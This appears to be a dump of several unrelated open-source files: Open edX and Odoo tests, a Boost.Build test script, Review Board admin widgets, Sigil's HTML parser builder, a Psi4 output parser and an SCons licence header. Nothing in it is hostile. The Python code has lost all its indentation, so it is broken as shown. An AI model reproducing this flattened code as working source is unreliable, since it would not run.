self.assertEqual(output['message'], "Message emailed for 8 of 9 recipients (skipping 3) (out of 10)")
self.assertFalse(output['succeeded'])
output = self._get_email_output_for_task_success(10, 10, 10, skipped=3)
self.assertEqual(output['message'], "Message successfully emailed for 10 recipients (skipping 3)")
self.assertTrue(output['succeeded'])
def test_get_info_for_queuing_task(self):
# get status for a task that is still running:
instructor_task = self._create_entry()
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_missing_output(self):
# check for missing task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = None
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No status information available")
def test_get_info_for_broken_output(self):
# check for non-JSON task_output
instructor_task = self._create_success_entry()
instructor_task.task_output = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No parsable status information available")
def test_get_info_for_empty_output(self):
# check for JSON task_output with missing keys
instructor_task = self._create_success_entry()
instructor_task.task_output = "{}"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "No progress status information available")
def test_get_info_for_broken_input(self):
# check for non-JSON task_input, but then just ignore it
instructor_task = self._create_success_entry()
instructor_task.task_input = "{ bad"
succeeded, message = get_task_completion_info(instructor_task)
self.assertFalse(succeeded)
self.assertEquals(message, "Status: rescored 2 of 3 (out of 5)")
| agpl-3.0 |
yxcoin/yxcoin | src/boost_1_55_0/tools/build/v2/test/library_chain.py | 44 | 3427 | #!/usr/bin/python
# Copyright 2003, 2004, 2005, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test that a chain of libraries works ok, no matter if we use static or shared
# linking.
import BoostBuild
import os
import string
t = BoostBuild.Tester(use_test_config=False)
# Stage the binary, so that it will be relinked without hardcode-dll-paths.
# That will check that we pass correct -rpath-link, even if not passing -rpath.
t.write("jamfile.jam", """\
stage dist : main ;
exe main : main.cpp b ;
""")
t.write("main.cpp", """\
void foo();
int main() { foo(); }
""")
t.write("jamroot.jam", "")
t.write("a/a.cpp", """\
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
gee() {}
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
geek() {}
""")
t.write("a/jamfile.jam", "lib a : a.cpp ;")
t.write("b/b.cpp", """\
void geek();
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
foo() { geek(); }
""")
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a ;")
t.run_build_system(["-d2"], stderr=None)
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Check that <library> works for static linking.
t.write("b/jamfile.jam", "lib b : b.cpp : <library>../a//a ;")
t.run_build_system(["link=static"])
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.write("b/jamfile.jam", "lib b : b.cpp ../a//a/<link>shared : <link>static ;")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Test that putting a library in sources of a searched library works.
t.write("jamfile.jam", """\
exe main : main.cpp png ;
lib png : z : <name>png ;
lib z : : <name>zzz ;
""")
t.run_build_system(["-a", "-d+2"], status=None, stderr=None)
# Try to find the "zzz" string either in response file (for Windows compilers),
# or in the standard output.
rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0]
if os.path.exists(rsp) and ( string.find(open(rsp).read(), "zzz") != -1 ):
pass
elif string.find(t.stdout(), "zzz") != -1:
pass
else:
t.fail_test(1)
# Test main -> libb -> liba chain in the case where liba is a file and not a
# Boost.Build target.
t.rm(".")
t.write("jamroot.jam", "")
t.write("a/jamfile.jam", """\
lib a : a.cpp ;
install dist : a ;
""")
t.write("a/a.cpp", """\
#if defined(_WIN32)
__declspec(dllexport)
#endif
void a() {}
""")
t.run_build_system(subdir="a")
t.expect_addition("a/dist/a.dll")
if ( os.name == 'nt' or os.uname()[0].lower().startswith('cygwin') ) and \
BoostBuild.get_toolset() != 'gcc':
# This is a Windows import library -- we know the exact name.
file = "a/dist/a.lib"
else:
file = t.adjust_names("a/dist/a.dll")[0]
t.write("b/jamfile.jam", "lib b : b.cpp ../%s ;" % file)
t.write("b/b.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void a();
#if defined(_WIN32)
__declspec(dllexport)
#endif
void b() { a(); }
""")
t.write("jamroot.jam", "exe main : main.cpp b//b ;")
t.write("main.cpp", """\
#if defined(_WIN32)
__declspec(dllimport)
#endif
void b();
int main() { b(); }
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.cleanup()
| mit |
brennie/reviewboard | reviewboard/admin/widgets.py | 7 | 17971 | from __future__ import unicode_literals
import datetime
import logging
import re
import time
from django.core.cache import cache
from django.contrib.auth.models import User
from django.db.models.aggregates import Count
from django.db.models.signals import post_save, post_delete
from django.template.context import RequestContext
from django.template.loader import render_to_string
from django.utils import six, timezone
from django.utils.translation import ugettext_lazy as _
from djblets.cache.backend import cache_memoize
from reviewboard.admin.cache_stats import get_cache_stats
from reviewboard.attachments.models import FileAttachment
from reviewboard.changedescs.models import ChangeDescription
from reviewboard.diffviewer.models import DiffSet
from reviewboard.reviews.models import (ReviewRequest, Group,
Comment, Review, Screenshot,
ReviewRequestDraft)
from reviewboard.scmtools.models import Repository
DAYS_TOTAL = 30 # Set the number of days to display in date browsing widgets
NAME_TRANSFORM_RE = re.compile(r'([A-Z])')
primary_widgets = []
secondary_widgets = []
class Widget(object):
"""The base class for an Administration Dashboard widget.
Widgets appear in the Administration Dashboard and can display useful
information on the system, links to other pages, or even fetch data
from external sites.
There are a number of built-in widgets, but extensions can provide their
own.
"""
# Constants
SMALL = 'small'
LARGE = 'large'
# Configuration
widget_id = None
title = None
size = SMALL
template = None
actions = []
has_data = True
cache_data = True
def __init__(self):
"""Initialize the widget."""
self.data = None
self.name = NAME_TRANSFORM_RE.sub(
lambda m: '-%s' % m.group(1).lower(),
self.__class__.__name__)[1:]
def render(self, request):
"""Render the widget.
This will render the HTML for a widget. It takes care of generating
and caching the data, depending on the widget's needs.
"""
if self.has_data and self.data is None:
if self.cache_data:
self.data = cache_memoize(self.generate_cache_key(request),
lambda: self.generate_data(request))
else:
self.data = self.generate_data(request)
return render_to_string('admin/admin_widget.html',
RequestContext(request, {
'widget': self,
}))
def generate_data(self, request):
"""Generate data for the widget.
Widgets should override this to provide extra data to pass to the
template. This will be available in 'widget.data'.
If cache_data is True, this data will be cached for the day.
"""
return {}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data.
By default, the key takes into account the current day. If the
widget is displaying specific to, for example, the user, this should
be overridden to include that data in the key.
"""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
def get_sync_num():
"""Get the sync_num, which is number to sync.
sync_num is number of update and initialized to 1 every day.
"""
KEY = datetime.date.today()
cache.add(KEY, 1)
return cache.get(KEY)
def _increment_sync_num(*args, **kwargs):
"""Increment the sync_num."""
KEY = datetime.date.today()
if cache.get(KEY) is not None:
cache.incr(KEY)
class UserActivityWidget(Widget):
"""User activity widget.
Displays a pie chart of the active application users based on their last
login dates.
"""
widget_id = 'user-activity-widget'
title = _('User Activity')
size = Widget.LARGE
template = 'admin/widgets/w-user-activity.html'
actions = [
{
'url': 'db/auth/user/add/',
'label': _('Add'),
},
{
'url': 'db/auth/user/',
'label': _('Manage Users'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
now = timezone.now()
users = User.objects
week = datetime.timedelta(days=7)
day = datetime.timedelta(days=1)
month = datetime.timedelta(days=30)
two_months = datetime.timedelta(days=60)
three_months = datetime.timedelta(days=90)
one_day = (now - week, now + day)
seven_days = (now - month, now - week)
thirty_days = (now - two_months, now - month)
sixty_days = (now - three_months, now - two_months)
ninety_days = now - three_months
return {
'now': users.filter(last_login__range=one_day).count(),
'seven_days': users.filter(last_login__range=seven_days).count(),
'thirty_days': users.filter(last_login__range=thirty_days).count(),
'sixty_days': users.filter(last_login__range=sixty_days).count(),
'ninety_days': users.filter(last_login__lte=ninety_days).count(),
'total': users.count()
}
class ReviewRequestStatusesWidget(Widget):
"""Review request statuses widget.
Displays a pie chart showing review request by status.
"""
widget_id = 'review-request-statuses-widget'
title = _('Request Statuses')
template = 'admin/widgets/w-request-statuses.html'
def generate_data(self, request):
"""Generate data for the widget."""
public_requests = ReviewRequest.objects.filter(public=True)
return {
'draft': ReviewRequest.objects.filter(public=False).count(),
'pending': public_requests.filter(status="P").count(),
'discarded': public_requests.filter(status="D").count(),
'submit': public_requests.filter(status="S").count()
}
class RepositoriesWidget(Widget):
"""Shows a list of repositories in the system.
This widget displays a table with the most recent repositories,
their types, and visibility.
"""
MAX_REPOSITORIES = 3
widget_id = 'repositories-widget'
title = _('Repositories')
size = Widget.LARGE
template = 'admin/widgets/w-repositories.html'
actions = [
{
'url': 'db/scmtools/repository/add/',
'label': _('Add'),
},
{
'url': 'db/scmtools/repository/',
'label': _('View All'),
'classes': 'btn-right',
},
]
def generate_data(self, request):
"""Generate data for the widget."""
repos = Repository.objects.accessible(request.user).order_by('-id')
return {
'repositories': repos[:self.MAX_REPOSITORIES]
}
def generate_cache_key(self, request):
"""Generate a cache key for this widget's data."""
syncnum = get_sync_num()
key = "w-%s-%s-%s-%s" % (self.name,
datetime.date.today(),
request.user.username,
syncnum)
return key
class ReviewGroupsWidget(Widget):
"""Review groups widget.
Shows a list of recently created groups.
"""
MAX_GROUPS = 5
widget_id = 'review-groups-widget'
title = _('Review Groups')
template = 'admin/widgets/w-groups.html'
actions = [
{
'url': 'db/reviews/group/',
'label': _('View All'),
'classes': 'btn-right',
},
{
'url': 'db/reviews/group/add/',
'label': _('Add'),
},
]
def generate_data(self, request):
"""Generate data for the widget."""
return {
'groups': Group.objects.all().order_by('-id')[:self.MAX_GROUPS]
}
class ServerCacheWidget(Widget):
"""Cache statistics widget.
Displays a list of memcached statistics, if available.
"""
widget_id = 'server-cache-widget'
title = _('Server Cache')
template = 'admin/widgets/w-server-cache.html'
cache_data = False
def generate_data(self, request):
"""Generate data for the widget."""
uptime = {}
cache_stats = get_cache_stats()
if cache_stats:
for hosts, stats in cache_stats:
if stats['uptime'] > 86400:
uptime['value'] = stats['uptime'] / 60 / 60 / 24
uptime['unit'] = _("days")
elif stats['uptime'] > 3600:
uptime['value'] = stats['uptime'] / 60 / 60
uptime['unit'] = _("hours")
else:
uptime['value'] = stats['uptime'] / 60
uptime['unit'] = _("minutes")
return {
'cache_stats': cache_stats,
'uptime': uptime
}
class NewsWidget(Widget):
"""News widget.
Displays the latest news headlines from reviewboard.org.
"""
widget_id = 'news-widget'
title = _('Review Board News')
template = 'admin/widgets/w-news.html'
actions = [
{
'url': 'https://www.reviewboard.org/news/',
'label': _('More'),
},
{
'label': _('Reload'),
'id': 'reload-news',
},
]
has_data = False
class DatabaseStatsWidget(Widget):
"""Database statistics widget.
Displays a list of totals for several important database tables.
"""
widget_id = 'database-stats-widget'
title = _('Database Stats')
template = 'admin/widgets/w-stats.html'
def generate_data(self, request):
"""Generate data for the widget."""
return {
'count_comments': Comment.objects.all().count(),
'count_reviews': Review.objects.all().count(),
'count_attachments': FileAttachment.objects.all().count(),
'count_reviewdrafts': ReviewRequestDraft.objects.all().count(),
'count_screenshots': Screenshot.objects.all().count(),
'count_diffsets': DiffSet.objects.all().count()
}
class RecentActionsWidget(Widget):
"""Recent actions widget.
Displays a list of recent admin actions to the user.
"""
widget_id = 'recent-actions-widget'
title = _('Recent Actions')
template = 'admin/widgets/w-recent-actions.html'
has_data = False
def dynamic_activity_data(request):
"""Large database acitivity widget helper.
This method serves as a helper for the activity widget, it's used with for
AJAX requests based on date ranges passed to it.
"""
direction = request.GET.get('direction')
range_end = request.GET.get('range_end')
range_start = request.GET.get('range_start')
days_total = DAYS_TOTAL
# Convert the date from the request.
#
# This takes the date from the request in YYYY-MM-DD format and
# converts into a format suitable for QuerySet later on.
if range_end:
range_end = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_end, "%Y-%m-%d")))
if range_start:
range_start = datetime.datetime.fromtimestamp(
time.mktime(time.strptime(range_start, "%Y-%m-%d")))
if direction == "next" and range_end:
new_range_start = range_end
new_range_end = \
new_range_start + datetime.timedelta(days=days_total)
elif direction == "prev" and range_start:
new_range_start = range_start - datetime.timedelta(days=days_total)
new_range_end = range_start
elif direction == "same" and range_start and range_end:
new_range_start = range_start
new_range_end = range_end
else:
new_range_end = datetime.datetime.now() + datetime.timedelta(days=1)
new_range_start = new_range_end - datetime.timedelta(days=days_total)
current_tz = timezone.get_current_timezone()
new_range_start = timezone.make_aware(new_range_start, current_tz)
new_range_end = timezone.make_aware(new_range_end, current_tz)
response_data = {
"range_start": new_range_start.strftime("%Y-%m-%d"),
"range_end": new_range_end.strftime("%Y-%m-%d")
}
def large_stats_data(range_start, range_end):
def get_objects(model_name, timestamp_field, date_field):
"""Perform timestamp based queries.
This method receives a dynamic model name and performs a filter
query. Later the results are grouped by day and prepared for the
charting library.
"""
args = '%s__range' % timestamp_field
q = model_name.objects.filter(**{
args: (range_start, range_end)
})
q = q.extra({timestamp_field: date_field})
q = q.values(timestamp_field)
q = q.annotate(created_count=Count('pk'))
q = q.order_by(timestamp_field)
data = []
for obj in q:
data.append([
time.mktime(time.strptime(
six.text_type(obj[timestamp_field]),
"%Y-%m-%d")) * 1000,
obj['created_count']
])
return data
comment_array = get_objects(Comment, "timestamp", "date(timestamp)")
change_desc_array = get_objects(ChangeDescription, "timestamp",
"date(timestamp)")
review_array = get_objects(Review, "timestamp", "date(timestamp)")
rr_array = get_objects(ReviewRequest, "time_added", "date(time_added)")
return {
'change_descriptions': change_desc_array,
'comments': comment_array,
'reviews': review_array,
'review_requests': rr_array
}
stats_data = large_stats_data(new_range_start, new_range_end)
return {
"range": response_data,
"activity_data": stats_data
}
class ActivityGraphWidget(Widget):
"""Detailed database statistics graph widget.
Shows the latest database activity for multiple models in the form of
a graph that can be navigated by date.
This widget shows a daily view of creation activity for a list of models.
All displayed widget data is computed on demand, rather than up-front
during creation of the widget.
"""
widget_id = 'activity-graph-widget'
title = _('Review Board Activity')
size = Widget.LARGE
template = 'admin/widgets/w-stats-large.html'
actions = [
{
'label': '<',
'id': 'db-stats-graph-prev',
'rel': 'prev',
},
{
'label': '>',
'id': 'db-stats-graph-next',
'rel': 'next',
},
{
'label': _('Reviews'),
'classes': 'btn-s btn-s-checked',
'rel': 'reviews',
},
{
'label': _('Comments'),
'classes': 'btn-s btn-s-checked',
'rel': 'comments',
},
{
'label': _('Review Requests'),
'classes': 'btn-s btn-s-checked',
'rel': 'review_requests',
},
{
'label': _('Changes'),
'classes': 'btn-s btn-s-checked',
'rel': 'change_descriptions',
},
]
has_data = False
def init_widgets():
"""Initialize the widgets subsystem.
This will listen for events in order to manage the widget caches.
"""
post_save.connect(_increment_sync_num, sender=Group)
post_save.connect(_increment_sync_num, sender=Repository)
post_delete.connect(_increment_sync_num, sender=Group)
post_delete.connect(_increment_sync_num, sender=Repository)
def register_admin_widget(widget_cls, primary=False):
"""Register an administration widget.
This widget will appear in the list of primary or secondary widgets.
The widget class must have a widget_id attribute set, and can only
be registerd once in a single list. A KeyError will be thrown if
attempting to register a second time.
"""
widget_id = widget_cls.widget_id
if not widget_id:
raise ValueError('The widget_id attribute must be set on %r'
% widget_cls)
if widget_cls in primary_widgets or widget_cls in secondary_widgets:
raise KeyError('"%s" is already a registered administration widget'
% widget_id)
if primary:
primary_widgets.append(widget_cls)
else:
secondary_widgets.append(widget_cls)
def unregister_admin_widget(widget_cls):
"""Unregister a previously registered administration widget."""
widget_id = widget_cls.widget_id
try:
primary_widgets.remove(widget_cls)
except ValueError:
try:
secondary_widgets.remove(widget_cls)
except ValueError:
logging.error('Failed to unregister unknown administration '
'widget "%s".',
widget_id)
raise KeyError('"%s" is not a registered administration widget'
% widget_id)
# Register the built-in widgets
register_admin_widget(ActivityGraphWidget, True)
register_admin_widget(RepositoriesWidget, True)
register_admin_widget(UserActivityWidget, True)
register_admin_widget(ReviewRequestStatusesWidget)
register_admin_widget(RecentActionsWidget)
register_admin_widget(ReviewGroupsWidget)
register_admin_widget(ServerCacheWidget)
register_admin_widget(NewsWidget)
register_admin_widget(DatabaseStatsWidget)
| mit |
eli-schwartz/Sigil | src/Resource_Files/plugin_launchers/python/sigil_bs4/builder/_htmlparser.py | 6 | 9793 | from __future__ import unicode_literals, division, absolute_import, print_function
import sys
PY3 = sys.version_info[0] == 3
if PY3:
text_type = str
binary_type = bytes
unicode = str
basestring = str
else:
range = xrange
text_type = unicode
binary_type = str
chr = unichr
"""Use the HTMLParser library to parse HTML files that aren't too bad."""
__all__ = [
'HTMLParserTreeBuilder',
]
if PY3:
from html.parser import HTMLParser
try:
from html.parser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
else:
from HTMLParser import HTMLParser
try:
from HTMLParser import HTMLParseError
except ImportError as e:
# HTMLParseError is removed in Python 3.5. Since it can never be
# thrown in 3.5, we can just define our own class as a placeholder.
class HTMLParseError(Exception):
pass
import warnings
# Starting in Python 3.2, the HTMLParser constructor takes a 'strict'
# argument, which we'd like to set to False. Unfortunately,
# http://bugs.python.org/issue13273 makes strict=True a better bet
# before Python 3.2.3.
#
# At the end of this file, we monkeypatch HTMLParser so that
# strict=True works well on Python 3.2.2.
major, minor, release = sys.version_info[:3]
CONSTRUCTOR_TAKES_STRICT = major == 3 and minor == 2 and release >= 3
CONSTRUCTOR_STRICT_IS_DEPRECATED = major == 3 and minor == 3
CONSTRUCTOR_TAKES_CONVERT_CHARREFS = major == 3 and minor >= 4
from sigil_bs4.element import (
CData,
Comment,
Declaration,
Doctype,
ProcessingInstruction,
)
from sigil_bs4.dammit import EntitySubstitution, UnicodeDammit
from sigil_bs4.builder import (
HTML,
HTMLTreeBuilder,
STRICT,
)
HTMLPARSER = 'html.parser'
class BeautifulSoupHTMLParser(HTMLParser):
def handle_starttag(self, name, attrs):
# XXX namespace
attr_dict = {}
for key, value in attrs:
# Change None attribute values to the empty string
# for consistency with the other tree builders.
if value is None:
value = ''
attr_dict[key] = value
attrvalue = '""'
self.soup.handle_starttag(name, None, None, attr_dict)
def handle_endtag(self, name):
self.soup.handle_endtag(name)
def handle_data(self, data):
self.soup.handle_data(data)
def handle_charref(self, name):
# XXX workaround for a bug in HTMLParser. Remove this once
# it's fixed in all supported versions.
# http://bugs.python.org/issue13633
if name.startswith('x'):
real_name = int(name.lstrip('x'), 16)
elif name.startswith('X'):
real_name = int(name.lstrip('X'), 16)
else:
real_name = int(name)
try:
data = chr(real_name)
except (ValueError, OverflowError) as e:
data = "\N{REPLACEMENT CHARACTER}"
self.handle_data(data)
def handle_entityref(self, name):
character = EntitySubstitution.HTML_ENTITY_TO_CHARACTER.get(name)
if character is not None:
data = character
else:
data = "&%s;" % name
self.handle_data(data)
def handle_comment(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(Comment)
def handle_decl(self, data):
self.soup.endData()
if data.startswith("DOCTYPE "):
data = data[len("DOCTYPE "):]
elif data == 'DOCTYPE':
# i.e. "<!DOCTYPE>"
data = ''
self.soup.handle_data(data)
self.soup.endData(Doctype)
def unknown_decl(self, data):
if data.upper().startswith('CDATA['):
cls = CData
data = data[len('CDATA['):]
else:
cls = Declaration
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(cls)
def handle_pi(self, data):
self.soup.endData()
self.soup.handle_data(data)
self.soup.endData(ProcessingInstruction)
class HTMLParserTreeBuilder(HTMLTreeBuilder):
is_xml = False
picklable = True
NAME = HTMLPARSER
features = [NAME, HTML, STRICT]
def __init__(self, *args, **kwargs):
if CONSTRUCTOR_TAKES_STRICT and not CONSTRUCTOR_STRICT_IS_DEPRECATED:
kwargs['strict'] = False
if CONSTRUCTOR_TAKES_CONVERT_CHARREFS:
kwargs['convert_charrefs'] = False
self.parser_args = (args, kwargs)
def prepare_markup(self, markup, user_specified_encoding=None,
document_declared_encoding=None, exclude_encodings=None):
"""
:return: A 4-tuple (markup, original encoding, encoding
declared within markup, whether any characters had to be
replaced with REPLACEMENT CHARACTER).
"""
if isinstance(markup, unicode):
yield (markup, None, None, False)
return
try_encodings = [user_specified_encoding, document_declared_encoding]
dammit = UnicodeDammit(markup, try_encodings, is_html=True,
exclude_encodings=exclude_encodings)
yield (dammit.markup, dammit.original_encoding,
dammit.declared_html_encoding,
dammit.contains_replacement_characters)
def feed(self, markup):
args, kwargs = self.parser_args
parser = BeautifulSoupHTMLParser(*args, **kwargs)
parser.soup = self.soup
try:
parser.feed(markup)
except HTMLParseError as e:
warnings.warn(RuntimeWarning(
"Python's built-in HTMLParser cannot parse the given document. This is not a bug in Beautiful Soup. The best solution is to install an external parser (lxml or html5lib), and use Beautiful Soup with that parser. See http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser for help."))
raise e
# Patch 3.2 versions of HTMLParser earlier than 3.2.3 to use some
# 3.2.3 code. This ensures they don't treat markup like <p></p> as a
# string.
#
# XXX This code can be removed once most Python 3 users are on 3.2.3.
if major == 3 and minor == 2 and not CONSTRUCTOR_TAKES_STRICT:
import re
attrfind_tolerant = re.compile(
r'\s*((?<=[\'"\s])[^\s/>][^\s/=>]*)(\s*=+\s*'
r'(\'[^\']*\'|"[^"]*"|(?![\'"])[^>\s]*))?')
HTMLParserTreeBuilder.attrfind_tolerant = attrfind_tolerant
locatestarttagend = re.compile(r"""
<[a-zA-Z][-.a-zA-Z0-9:_]* # tag name
(?:\s+ # whitespace before attribute name
(?:[a-zA-Z_][-.:a-zA-Z0-9_]* # attribute name
(?:\s*=\s* # value indicator
(?:'[^']*' # LITA-enclosed value
|\"[^\"]*\" # LIT-enclosed value
|[^'\">\s]+ # bare value
)
)?
)
)*
\s* # trailing whitespace
""", re.VERBOSE)
BeautifulSoupHTMLParser.locatestarttagend = locatestarttagend
from html.parser import tagfind, attrfind
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = rawdata[i+1:k].lower()
while k < endpos:
if self.strict:
m = attrfind.match(rawdata, k)
else:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
if self.strict:
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
BeautifulSoupHTMLParser.parse_starttag = parse_starttag
BeautifulSoupHTMLParser.set_cdata_mode = set_cdata_mode
CONSTRUCTOR_TAKES_STRICT = True
| gpl-3.0 |
susilehtola/psi4 | psi4/driver/procrouting/findif_response_utils/data_collection_helper.py | 6 | 4102 | #
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2021 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module of helper functions for distributed ccresponse computations.
Defines functions for retrieving data computed at displaced geometries.
"""
from psi4.driver import p4util
def collect_displaced_matrix_data(db, signature, row_dim):
"""
Gathers a list of tensors, one at each displaced geometry.
db: (database) the database object for this property calculation
signature: (string) The string that notifies the matrix reader that the
targeted tensor data begins.
row_dim: the expected number of rows that this value should be printed
across in the file
Returns a 2d list result[i][j]:
i: indexes displacements
j: indexes elements of the flattened tensor at some displacement
Throws: none
"""
result = []
for job in db['job_status']:
with open('{}/output.dat'.format(job)) as outfile:
result.append(parse_geometry_matrix_data(outfile, signature, row_dim))
return result
# END collect_displaced_matrix_data()
def parse_geometry_matrix_data(outfile, matrix_name, row_tot):
"""
Parses data from a 3 by n matrix printed to a file
outfile: ( file ) handle open in read mode, where the data should be found
matrix_name: ( string ) that indicates the matrix data is found on the lines
below
row_tot: ( int ) indicates the number of lines that the matrix data should
be printed across in the file
Returns: matrix_data a list of matrix elements, len = 3*row_tot
Throws: ParsingError (Collecting matrix data failed) if
It can't find matrix_header in the file.
It found matrix_header, but no data.
It found matrix_header, and data but the number of elements is
incorrect.
"""
collect_matrix = False
n_rows = 0
n_tries = 0
matrix_data = []
for line in outfile:
if matrix_name in line:
collect_matrix = True
if collect_matrix and (n_rows < row_tot):
try:
n_tries += 1
if n_tries > (row_tot + 13):
raise p4util.ParsingError('{} Matrix was unreadable. Scanned {}'
'lines.'.format(matrix_name, n_tries))
else:
(index, x, y, z) = line.split()
matrix_data.append(float(x))
matrix_data.append(float(y))
matrix_data.append(float(z))
n_rows += 1
except:
pass
if (n_rows == row_tot) and (len(matrix_data) != 3 * row_tot):
raise p4util.ParsingError('Collecting {} data failed!'
'\nExpected {} elements but only captured {}'.format(
matrix_name, 3 * row_tot, len(matrix_data)))
if len(matrix_data) == 3 * row_tot:
return matrix_data
raise p4util.ParsingError('data for {} was not found in the output file, '
'but it was marked for collection. Check output files '
'in displacement sub-dirs!'.format(matrix_name))
# END parse_geometry_matrix_data()
| lgpl-3.0 |
wangjun/odoo | openerp/addons/base/tests/test_menu.py | 501 | 1450 | import openerp.tests.common as common
class test_menu(common.TransactionCase):
def setUp(self):
super(test_menu,self).setUp()
self.Menus = self.registry('ir.ui.menu')
def test_00_menu_deletion(self):
"""Verify that menu deletion works properly when there are child menus, and those
are indeed made orphans"""
cr, uid, Menus = self.cr, self.uid, self.Menus
# Generic trick necessary for search() calls to avoid hidden menus
ctx = {'ir.ui.menu.full_list': True}
root_id = Menus.create(cr, uid, {'name': 'Test root'})
child1_id = Menus.create(cr, uid, {'name': 'Test child 1', 'parent_id': root_id})
child2_id = Menus.create(cr, uid, {'name': 'Test child 2', 'parent_id': root_id})
child21_id = Menus.create(cr, uid, {'name': 'Test child 2-1', 'parent_id': child2_id})
all_ids = [root_id, child1_id, child2_id, child21_id]
# delete and check that direct children are promoted to top-level
# cfr. explanation in menu.unlink()
Menus.unlink(cr, uid, [root_id])
remaining_ids = Menus.search(cr, uid, [('id', 'in', all_ids)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id, child21_id], remaining_ids)
orphan_ids = Menus.search(cr, uid, [('id', 'in', all_ids), ('parent_id', '=', False)], order="id", context=ctx)
self.assertEqual([child1_id, child2_id], orphan_ids)
| agpl-3.0 |
angad/libjingle-mac | scons-2.2.0/engine/SCons/exitfuncs.py | 14 | 2436 | """SCons.exitfuncs
Register functions which are executed when SCons exits for any reason.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
